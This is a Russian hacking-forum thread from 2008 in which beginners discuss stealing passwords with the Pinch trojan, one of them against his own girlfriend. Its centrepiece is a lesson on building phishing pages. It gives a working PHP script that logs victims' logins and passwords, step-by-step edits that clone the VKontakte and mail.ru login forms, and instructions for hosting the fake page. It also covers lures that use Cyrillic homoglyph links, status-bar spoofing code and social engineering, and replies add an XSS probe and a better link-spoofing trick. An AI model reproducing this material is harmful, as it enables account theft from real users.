RE: Уроки от Xakep9009(для новичков!)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-06 17:54:14.853333
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Marihuanna
Скажите пожалуйста , по каким причинам на Google.com мои браузеры не заходят, пробовала с оперы, с мозилы , и с эксплорера??
http://forum.xakep.ru/m_1269250/mpage_1/key_/tm.htm#1269250
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-06 18:14:30.510000
|
|
|
Marihuanna
Сообщений: 36
Оценки: 0
Присоединился: 2008-10-24 13:50:28.853333
|
Я так ничего и не поняла((((Какие прокси??(
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-06 18:34:51.946666
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
ORIGINAL: Marihuanna
Я так ничего и не поняла((((Какие прокси??(
что не понятно? то что есть территориальная привязка по IP ["АЙпииииии"] ?
если это понятно то что нужно сделать чтобы войти в зону .com гугла?
ага! или зайти с IP той страны, в которой территориальная привязка сделана именно на зону .COM или с IP той страны, в которой вообще нет этой привязки…
Первое, я считаю, будет легче сделать, а что нужно для этого сделать? правильно! поменять IP… это делается с помощью ПроксиСервера ["Ахтунга"]…
что такое прокси можно почитать в google.ru
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-06 20:44:13.790000
|
|
|
4estor
Сообщений: 3
Оценки: 0
Присоединился: 2008-11-03 20:50:51.986666
|
И теперь наконец….как же из файла *.bin получить информацию…..
Берём сохраняем этот файл себе на Жёсткий диск
ya ne ponal 4to zna4it sohranit na jostkiy disk….. ono vit itak v compe? =\
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-06 20:45:40.946666
|
|
|
4estor
Сообщений: 3
Оценки: 0
Присоединился: 2008-11-03 20:50:51.986666
|
я вот тут не понял в уроке номер 6 там нашот parser ти сказал "И теперь наконец….как же из файла *.bin получить информацию…..
Берём сохраняем этот файл себе на Жёсткий диск"
так я не понял что имено сохранять? вить фаил и так в компе…
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-06 20:47:39.180000
|
|
|
Zorgus
Сообщений: 1342
Оценки: 0
Присоединился: 2007-11-25 11:45:46.433333
|
отчет тебе не на комп приходит, а на мыло или на хост, потом копируешь его себе на комп, Открываешь парсер и переносишь туда этот отчет
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 10:10:18.386666
|
|
|
WN
Сообщений: 20
Оценки: 0
Присоединился: 2008-11-06 16:04:38.516666
|
quote:
Прога супер. Для создания разнообразных вирусов. Обновлена недавно. Скачиваем оба файла. Работают вместе. Пароль 666
http://depositfiles.com/files/sbokg1nai
http://depositfiles.com/files/hja8ly7cj
Надеюсь никто на это не повелся?
——————————————————
Объясните дураку. Я думал, что я в компах хоть что-то шарю. Оказалось ничего. Вроде не тупой. Теперь я стал в этом сомневаться.
Прочитав статью Возрождение динозавров, я решил забацать пинчег. Забацал, строго следил в инструкцию. И нифига не получилось =_=…
Если кому не влом, ответьте пожалста. Спс.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 10:21:27.806666
|
|
|
trofik
Сообщений: 56
Оценки: 0
Присоединился: 2008-08-13 18:19:10.860000
|
в этой проге единственное что не устраивает то что нельзя увидеть строение созданного им вируса. а так поглумиться в школьных компах сойдёт:D
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 11:41:58.583333
|
|
|
WN
Сообщений: 20
Оценки: 0
Присоединился: 2008-11-06 16:04:38.516666
|
==============Внимание=============
По просьбам читателей (но их к сожалению не было) я собрал воедино
все статьи Хакер9009 в программу. Быстрый допуск ко всем урокам,
Поиск по всей базе. И главное - оффлайн. Теперь вы не зависите ни от
капризов инета, ни от капризов погоды (если WiFi).
======>Скачать<=======
P.S. Оставляйте свои комменты. Не откажусь и от критики.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 12:35:57.163333
|
|
|
13thApostol
Сообщений: 134
Оценки: 0
Присоединился: 2008-11-03 23:41:57.986666
|
Прикольна придумал);)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 12:39:47.350000
|
|
|
SpaWn_007
Сообщений: 98
Оценки: 0
Присоединился: 2008-02-19 11:24:59.806666
|
по ней как будто граблями прошлись (
не открывается ни в ie ни в опере
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 12:52:25.270000
|
|
|
WN
Сообщений: 20
Оценки: 0
Присоединился: 2008-11-06 16:04:38.516666
|
quote:
по ней как будто граблями прошлись (
не открывается ни в ie ни в опере
эээ… Это вообщето база. Находится в RAR архиве. После распаковки открой "Run.exe".
Все должно работать.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 13:03:32.990000
|
|
|
SpaWn_007
Сообщений: 98
Оценки: 0
Присоединился: 2008-02-19 11:24:59.806666
|
ой ссори просто в первый раз у меня какая то чуш скалась с расширением .htm
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 13:09:34.756666
|
|
|
Sakar
Сообщений: 116
Оценки: 0
Присоединился: 2008-09-17 13:33:33.223333
|
quote:
ORIGINAL: 13thApostol
так неинтересно номер от квипа видит а пароль пишит (hex)….. в процесах агент запущен а непишет даже простого адреса мыло….неинтересно как то на его озу и айппи сматреть……… я думал пинч куке отчёты ишо слать будет xD
Аси ворует от ICQ2003, мыла, анкеты разных сайтов(вконтакте, одноклассники) ворует спокойно, у меня даже подключения к интернету ворует, просто ты не тому отправил))))
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-07 19:36:50.680000
|
|
|
13thApostol
Сообщений: 134
Оценки: 0
Присоединился: 2008-11-03 23:41:57.986666
|
нащёт ась хз…. пароли от падключения приходит но они мне наф ненуны… а вот Вконтакт маил яндекс я специально паставил на автосахранение и протестил и шиш.. отчоты по железу и падключению фикня(
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 11:39:15.223333
|
|
|
zhuchock
Сообщений: 1
Оценки: 0
Присоединился: 2008-11-07 21:38:46.070000
|
Спасибо большое за уроки!:D
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 14:46:18.170000
|
|
|
trofik
Сообщений: 56
Оценки: 0
Присоединился: 2008-08-13 18:19:10.860000
|
классная прога =) +2 её создателю.:)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 15:43:22.903333
|
|
|
[M.E.D.E.T]
Сообщений: 48
Оценки: 0
Присоединился: 2008-11-08 15:26:14.780000
|
БРАТВА помагите с пинчем прасером!!!
пояснее плиз
>настроел пинч3
>вышел файл pinch3.exe
>закинул её своей девушке, а отчеты не преходят, может я прасер не насторил правильно??!!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 16:05:17.700000
|
|
|
Dgoker
Сообщений: 7
Оценки: 0
Присоединился: 2008-11-08 09:47:29.100000
|
если вставляю в форму '><sсriрt>alert('Xakep9009_Rullzz')</sсriрt> и не происходит того о чем писал Хакер9009 значит уязвимости нет?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 16:08:54.793333
|
|
|
xardas90
Сообщений: 29
Оценки: 0
Присоединился: 2008-10-18 16:11:17.966666
|
Почитай Фленова "Веб-сервер глазами хакера". Он очень подробно об этом пишет.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 16:13:32.700000
|
|
|
Dgoker
Сообщений: 7
Оценки: 0
Присоединился: 2008-11-08 09:47:29.100000
|
спасибо почитаю
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 16:20:02.716666
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: [M.E.D.E.T]
БРАТВА помагите с пинчем прасером!!!
пояснее плиз
>настроел пинч3
>вышел файл pinch3.exe
>закинул её своей девушке, а отчеты не преходят, может я прасер не насторил правильно??!!
Парсер не причём… Он лишь читает отчёты,скорее всего неправильновыбран хостинг или размещён гейт..
quote:
если вставляю в форму '><sсriрt>alert('Xakep9009_Rullzz')</sсriрt> и не происходит того о чем писал Хакер9009 значит уязвимости нет?
Возможно значение формы закрываеться "> а ты закрываешь её одинарной кавычкой ,посмотри сорц страницы.
зы:прочитай статью внимательно епт
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 16:59:14.153333
|
|
|
xardas90
Сообщений: 29
Оценки: 0
Присоединился: 2008-10-18 16:11:17.966666
|
S00pY, здесь мейловый пинч, а не гейтовый.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-08 17:26:45.890000
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
quote:
ORIGINAL: xardas90
S00pY, здесь мейловый пинч, а не гейтовый.
ну значит криво выбран мыл сервер или у девушки стоит фаер(или чёто подобное) который режит отправку или девушка не запускала пинчь или …….. короче причин миллион, суть в том что парсер там не причём))
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-13 12:29:31.270000
|
|
|
26Rus
Сообщений: 56
Оценки: 0
Присоединился: 2008-09-23 20:32:42.170000
|
По поводу Google, нашел ссылку на интересную статейку. Есть что почитать, и не только начинающим. >>ТУТ<<
>>>Вот еще НЕМНОЖКО.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-14 02:54:07.960000
|
|
|
CaNNaBiS1990
Сообщений: 9
Оценки: 0
Присоединился: 2008-10-05 16:42:17.103333
|
quote:
ORIGINAL: xardas90
Парни, нужна прога PortFuck или подобная ей. Заколебался уже гуглить, куча ссылок, все битые. Может у кого есть? Скиньте ссылочку или киньте на мыло xardas90@mail.ru плиз.
а не боишся что тебе закинуть пинча или что-то по-круче??? или уверен в своем антивире???
как выжу на сайте нет никакого продвижения!!!! Что хакерством уже никто не интересуется??? Или никто не учит???
quote:
ORIGINAL: Фонарег
Народ подскажите на счет Урока Где про ПИНЧ где взять *.bin файл я не догоняю(((((((((((((((
Тебе скажу, что может не получится. Я думал заразить один камп Проратом, скачал Прорат 1.9 Спец Едишен, зделал сервер и для "прыкола" врубал антивир… за 2 сек она сожрала сервер (хоча Прорат 1.9 Спец Едишен обыщал, что антивир не будет его видеть) и сам Прорат. Если ты закинеш пинч на камп, то ему нужно будет запуститься( что б почать тырыть пароли, другого я не вижу) , а тут антивир (если владелец компа не полный идиот), думай дальше сам. Реально ли получить отчет?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-14 07:15:39.300000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
а не боишся что тебе закинуть пинча или что-то по-круче??? или уверен в своем антивире???
бред
quote:
как выжу на сайте нет никакого продвижения!!!! Что хакерством уже никто не интересуется??? Или никто не учит???
на сайте == в этой теме?
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-14 13:07:58.393333
|
|
|
Ivan Petrovich
Сообщений: 20
Оценки: 0
Присоединился: 2008-11-04 19:01:55.160000
|
;) купи новый джойнер, и будет тебе счастье!
Не все они идеальны.
А лучше под себя заказывать - не пожалеешь!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-14 14:47:33.150000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
мой джой
http://forum.xakep.ru/m_1266324/mpage_2/key_/tm.htm#1282936
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 04:28:24.103333
|
|
|
Xakep9009
Сообщений: 1067
Оценки: 0
Присоединился: 2006-08-28 02:34:39
|
Можно пропустить.
_______________________________________________________
Я таки вернулся….извиняюсь ,что так долго небыло…..даже
сейчас пишу в замен своей оценке по МЭО =)))у нас сегодня будет
зачёт по этому предмету =)))Ну надеюсь вы этот урок оцените…ибо он будет
посвящён…
_______________________________________________________
Урок 13.
Создаём собственный фейк!
Фейк произошло от Английского слова fake — подделка.
В нашем случае мы будем подделывать странички авторизации , для того чтобы заполучить заветный логин:пароль от любого сайта.
Я встречал много тем….там где продают фейки….а люди даже их покупают…..8D запомните всё самое лучшее можете сделать вы сами….и делаете это вы бесплатно!ну и перед тем как начать….хочу сказать ,что создание фейков это очень лёгкое дело….
Моё главное требование к этому уроку это знание html.
Не смотря на то ,что я буду использовать php(файлик)…знание его вам в этом уроке вообще не понадобится!
Создаём фейк Vkontakte
1)Первым делом зайдём на страничку Vkontakte.ru
//И если вы зашли под своей учётной записью выйдите из неё.
Перед вами должна открыться страничка "Добро пожаловать" её мы и будем потделывать.
2)Создаём папку на рабочем столе под названием sait
После чего сохраняем страничку vkontakte.ru (добро пожаловать)вот таким способом….в
-Firefox (Файл—Сохранить как…—(далее переходим в ту папку куда сохранять "sait")—(Выбираем тип страницы "Веб-страница полностью" ,a имя файла даёте index.html)
-Opera(Файл—Сохранить как—(переходим в папку sait)—(Выбираем тип файла "HTML файл с изображениями" имя файла index.html)
-Internet Explorer(Файл—Сохранить как—(Выбираем тип фалйа "Веб-страница полностью" имя файла index.html)
_________________________________________________________________________________________________________
Но не делайте пожалуйста очень популярной ошибки…..такой как index.html.html , index.html.mnt //двойное расширение.
Для того чтобы её избежать этой ошибки поставьте у себя в настройках:
Панель управления—Свойство папки—(вкладка) вид—(и снять галку с поля)"Скрывать расширения для зарегистрированных типов файлов"–ОК
И теперь у ваших файлов всегда будет отображаться расширение!
__________________________________________________________________________________________________________
И так мы сохранили страничку полностью!
Теперь если мы откроем наш index.html мы увидим ,что у нас полностью идентичная страничка!(Для этого мы и сохраняли не только html но и сами картинки).
3)Теперь нам надо подредактировать код этой странички так, чтобы когда пользователь ввёл логин и пароль….на нашей страничке все пароли сохранились у нас на сервере…..
для этого нам понадобится один php файлик с таким содержанием.
_________________________________________________________________________
<?
$Login = $_POST['login']; // Логин…
$Pass = $_POST['passwd']; // Пароль…
$log = fopen("base.php","a+"); //открываем файл хранилища…
fwrite($log,"<br> $Login:$Pass \n"); //записываем всё в хранишище…
fclose($log); //закрываем хранилище
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://vkontakte.ru'></head></html>"; // перенаправляем пользвателя на любую //ссылку в данном случае http://vkontakte.ru
?>
_________________________________________________________________________
Сохраняем этот файлик под названием log.php
И создаём файлик base.php //с пустым содержанием.
Да, и всё это мы сохраняем в папку sait там где у нас лежит наш будущий фейк.
4)Теперь перейдём непосредственно к редактированию index.html
Открываем его в любом редакторе (блокноте или NotePad++) //Очень рекомендую всем кто занимается кодингом использовать NotePad++ удобно.
И всё ,что нам нужно для создания собственного фейка это
4.1)Найти Форму для регистрации<form ….
4.2)Присвоить ей значение action="log.php" тоесть получится <form action="log.php" ….>
4.3)И в поле name присвоить login или passwd(name="login" ,name="passwd")
Не пугайтесь сейчас всё поясню на примере….:D
А пока знайте ….что значения в поле name (login , passwd) присваиваются именно такие ,потому как я им присвоил значение в моём мини php скрипте….(я их выделили жирным цветом)
А при помощи action="log.php" мы форме говорим "ДЕЛАЙ ТО ,ЧТО НАПИСАНО В ЭТОМ СКРИПТЕ!".
И так поехали….
1)Ищем форму которая занимается авторизацией!
Делаем мы это так….
Открываем наш index.html при помощи блокнота….
жмём: Правка—Найти—(ищем вот что…) <form
И первое ,что нам выдаётся это вот эта строчка…
<form method="post" name="login" id="login" action="login.php">
Это то что нам нужно! мы по интуиции догадались….что наверное action="login.php" выполняет скрипт для входа в систему….=) тут и ёж поймёт…
Теперь нам надо ,чтобы вместо ихнего скрипта выполнялся наш….значит пишем так….
<form method="post" name="login" id="login" action="log.php">
Далее нам уже надо искать <input в который идёт информация о Логине….Вконтакте это поле называют Email.
Пробуем искать…..и находим вот такую строчку….
<input class="inputText" onclick="show('expirePad');" name="email" id="email" size="20" type="text">
Меняем ,как я уже говорил на наше значение…..name="login" и у нас плучается
<input class="inputText" onclick="show('expirePad');" name="login" id="email" size="20" type="text">
Точно так же ….глазками ищем что то похожое на password или pass и мы находим
<input class="inputText" onclick="show('expirePad');" name="pass" id="pass" size="20" type="password">
Заменяем на наше значение….
<input class="inputText" onclick="show('expirePad');" name="passwd" id="pass" size="20" type="password">
Вот и всё….наш фейк готов! =)))
А вы думали ,что это тяжело….или вообще не думали8D
Теперь нам надо его опробовать….
Я вам говорил ,что для наших нужд понадобится….сервер…..можете проверить всё на вашем компьютере(локальном серевере)//PHP+Apach+MySQL см прошлые уроки.
Либо сделать как я =)))выложить своё творение на бесплатный хостинг t35.com =)))
Я зарегал себе там бесплатный акаутн…..так как там есть всё ,что нам нужно php+FTP
Если хотите посмотреть на мой фейк…то он расположен тут http://vkontaktee.t35.com
При выборе моего пути надеюсь трудностей не возникло….(регистрация)
После того как вы зарегистрировались…..вы можете выкладывать свой сайт….
Делается это чень просто…..открываем "Мой компьютер" и в том месте где написанно "Мой компьютер" (адресная строка) прописываем ftp.t35.com
Далее в появившимся окошке вводим
Логин и Пароль….вашей учётной записи….вот такого вида…
vkontaktee.t35.com : qwertypass
После чего у вы подключитесь к серверу…..и это у вас будет выглядеть…как будто вы находитесь в папке …в которой ничего нету….
Так вот это называется корневая директория …..переносим туда все наши файлы….
1)index.html
2)полностью папку(с изображениями которая была создана вместе с index.html иначе у нас не будет никаких картинок и логотипов.)
3)base.php
4)log.php
Теперь ваш фейк полностью готов к применению.
Проверяем его работоспособность…..
Заходим на свою страничку…..допустим vkontaktee.t35.com
И проходим авторизацию……(как мы это делаем обычно)
после чего……переходим по ссылке vkontaktee.t35.com/base.php
И видим ,что у нас записался логин и пароль……в файлик base.php
Всё.
Давайте для закрепления матерьяла рассмотрим еще один пример с mail.ru
Создаём собственный фейк для mail.ru
Поехали по схеме….
1)сохраняем нашу страничку со всеми картинками и всяким бредом…..и называем её index.html
2)Открываем и начинаем редактировать….
ищем форму для авторизации <form (там где action= хоть как то похож на автризацию……)
вот что мы нашли….
<form name="Auth" method="post" action="http://win.mail.ru/cgi-bin/auth"> //очень похожо на авторизацию не правда ли ?
Заменяем на
<form name="Auth" method="post" action="log.php">
продолжаем идти по схеме…и ищем <input связанный хоть как то с login и password
и мы находим эти поля
<input type="text" class="long" size="10" name="Login" tabindex="1" value="" />
<input type="password" class="long" size="15" name="Password" tabindex="3" value="" />
Меняем их на наши значения….login и passwd // хочу сразу заметить ,что регистр очень важен….Login и login разные вещи!
<input type="text" class="long" size="10" name="login" tabindex="1" value="" />
<input type="password" class="long" size="15" name="passwd" tabindex="3" value="" />
вот и всё….фейк готов….
Те кто знают html могут сделать этот фейк из любительского….в профессиональный….(тоесть при переходе по ссылкам в этих страничках….ты всёравно выходишь на фэйковский ресурс….)
Тот же Вконтакте ….мне было просто лень делать тоже самое но только в том случае если жертва нажмёт не на вход ,а на ,допустим Регистрацию или допустим на смену языка……..короче это всё делается по токому же принцыпу…..и надеюсь хоть чуть чуть он вам стал понятен….
"Надо учить формы }=) "
———————————————————————————-
Но….вы наверное возмутитесь…..если я вам скажу ,что все сворованные пароли может посмотреть любой проходимец….да это факт….как с этим бороться…..учить php… и моё к вам задание сделайте так…,чтобы файлик base.php не мог просматриваться посторонними лицами…НО! при этом ,чтобы он оставался работоспособным!
это я вам на всякий случай сказал…чтобы небыло тут баталий….а я могу твои данный стянуть, учитесь защите.
———————————————————————————-
если кому то всё еще не понятно как делаются фейки…..я для вас выложил свои 4 фейка….в качестве примера……
vkontakte.ru
forum.xakep.ru
Gmail.com
mail.ru
сюда http://vkontaktee.t35.com/fakes_By_Xakep9009.rar
Несколько способов впарить фейк
Ну и теперь парочку примеров из практики….
1)
чаще всего я свои фейки прячу в ссылки на форумах….или в почте……в ICQ к сожалению такой фишки как
Тоесть я прячу нашу ссылку вот так….. пишу httр://vkоntаktе.ru только малая хитрость заключается в том ,что
в место p - английской…я написал букву р -русскую …..в место о - английской о -русскую…..ну вы поняли логику…..таким образом у нас из http://vkоntakte.ru получился обычный текст ….а не ссылка….а во всех форумах и почтовых серверах(или почти во всех) есть функция вставлять ссылку в слова…..
типо скачивать >>>>>сюда<<<<<
Это был первый способ….
Второй мне больше по душе =)))на него ловятся 99,9% людей…..
Хакеры это хорошие психологи….и любой хакер должен знать не только слабость ресурса(сайта) но и его хозяйна…..
И поэтому заявления ,что СИ (соц инженерия) это не по хакрески это полная глупость
почитайте кстати про Социальную Инженерию
Меня уже несколько раз просили написать про СИ….вот один из моих любимых примеров внедрения фейка при помощи СИ….
Я говорю / пишу жертве , что нашёл обалочку…через которую можно подключиться к сайту вконтакте…..и качать от тудо музыку , кино, просматривать скрытую информацию. (этот способ использую тогда , когда скрыть ссылку почти невозможно) но он эффективен как я уже говорил на 99,9% =D ибо алчность людей до безумства сводит……
Кстати хакеров тоже….так что не будьте алчными….
Еще один способ это подмена URL (адресной строки) в строке состояния…..тобишь то,что вы видите наведя курсором на ссылку.
Но его можно использовать только если жертва сидит под IE (что бывает в большинстве случев)
и так пишем html код
<a href="http://vkontaktee.t35.com/"
onMouseOver="window.status = 'http://vkontakte.ru';
return true;"
onMouseOut="window.status='';">http://vkontakte.com</a>
Теперь при наведении на ссылку у нас в левом нижнем углу будет высвечиваться vkontakte.ru а не мой фейк_)
Каждый из вас может придумать свой способ….и пользоваться им!=) и он будет успешным))Так что не расчитывайте на других…учитесь думать сами…..я вот учусь =-) хоть и безуспешно ^^
Вывод
1)Мы сегодня познакомились с вами еще с одним видом атаки на WEB сайты.
2)Повторили что такое ftp .
3)Рассмотрели несколько способов "впаривания фейков".
4)Поняли ,что фейк может создать любой….лижбы было желание.
5)Поставили точку в обсуждении о нужности СИ (соц. инженерии). НУЖНА.
6)Повторили html =)
7)Ну и самое главное научились делать фейк!и нам теперь ненадо постить "люди создайте фейк от forum.sex.ru" =)
______________________________________________________________________________
Надеюсь этот урок вам понравится =-)
И вы узнаете \ узнали что то новое!
Удачи!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 05:17:08.886666
|
|
|
Djeros
Сообщений: 235
Оценки: 0
Присоединился: 2007-06-06 12:30:25.236666
|
Xakep9009 отличная статья.. очень интересная и познователная статья. продолжай в том же духе.. спасибо за статью.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 10:06:30.390000
|
|
|
Pavlon
Сообщений: 11
Оценки: 0
Присоединился: 2008-10-28 15:18:04.506666
|
Xakep9009, большое спасибо за интересные уроки.
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 11:19:28.946666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
quote:
<a href="http://vkontaktee.t35.com/"
onMouseOver="window.status = 'http://vkontakte.ru';
return true;"
onMouseOut="window.status='';">http://vkontakte.com</a>
Я думаю будет лучше вот так:
<A HREF="Оригинальный сайт" onClick="window.navigate('Фейковый сайт');window.event.returnValue=false;">Ссылка</A>
Это лучше по двум причинам:
1) В браузере можно поставить запрет на изменение строки состояния
2) Если человек раньше заходил на оригинальный сайт, то моя ссылка будет выглядеть как уже посещенная, и не вызовет подозрений:)
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 16:07:49.936666
|
|
|
_chez_
Сообщений: 4
Оценки: 0
Присоединился: 2008-11-08 12:55:42.613333
|
За урок спасибо, отличный урок!
Но только вот у меня не получилось зайти на ftp.t35.com - зарегался, прошел по ссылке на мыле, а заходить не хочет [:(]
Да, и второе - насчет
quote:
ORIGINAL: Xakep9009
и моё к вам задание сделайте так…,чтобы файлик base.php не мог просматриваться посторонними лицами…НО! при этом ,чтобы он оставался работоспособным!
похоже придется напреч мозги :D
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 17:01:58.050000
|
|
|
Cheloveg
Сообщений: 102
Оценки: 0
Присоединился: 2008-07-14 12:07:39.023333
|
quote:
и моё к вам задание сделайте так…,чтобы файлик base.php не мог просматриваться посторонними лицами…НО! при этом ,чтобы он оставался работоспособным!
помоему так
<?php echo '<H1>Доступ к базе закрыт!!!</H1>'; exit; ?>
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 17:33:03.953333
|
|
|
Cheloveg
Сообщений: 102
Оценки: 0
Присоединился: 2008-07-14 12:07:39.023333
|
где-то старый фэйк завалялся и я из басе.пхп вытащил это=))
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 17:34:11.440000
|
|
|
Cheloveg
Сообщений: 102
Оценки: 0
Присоединился: 2008-07-14 12:07:39.023333
|
и кстати почему не так?
там ведь доступ закрывается, и отчетов не показывает!
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 18:07:12.560000
|
|
|
koro
Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
|
quote:
и кстати почему не так?
там ведь доступ закрывается, и отчетов не показывает!
во-первых учимся писать грамотно:
<?php die('<H1>Доступ к базе закрыт!!!</H1>') ; ?>
во-вторых как ты сам будешь просматривать содержимое? каждый раз из сорсов?
думай лучше если и вправду что-то знаешь
|
|
|
|
|
RE: Уроки от Xakep9009(для новичков!) - 2008-11-17 18:15:45.690000
|
|
|
Cheloveg
Сообщений: 102
Оценки: 0
Присоединился: 2008-07-14 12:07:39.023333
|
да мне и не трудно через ТС просматривать так надежнее!
|
|
|
|
|
|
